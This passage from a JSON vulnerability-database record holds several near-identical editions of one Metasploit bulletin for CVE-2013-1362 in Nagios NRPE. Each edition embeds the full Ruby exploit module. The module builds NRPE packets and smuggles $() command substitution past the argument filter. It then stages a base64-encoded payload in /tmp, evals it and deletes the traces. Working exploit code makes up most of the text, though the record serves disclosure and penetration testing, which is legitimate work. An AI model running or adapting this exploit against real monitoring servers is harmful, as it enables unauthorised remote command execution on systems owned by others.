When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-20T05:38:35", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-11-20T05:38:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-20T05:38:35", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-12-31T11:57:46", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-12-31T11:57:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-12-31T11:57:46", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-12-31T13:55:58", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-12-31T13:55:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-12-31T13:55:58", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-07T14:01:46", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-07T14:01:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-07T14:01:46", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-07T16:01:32", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-07T16:01:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = 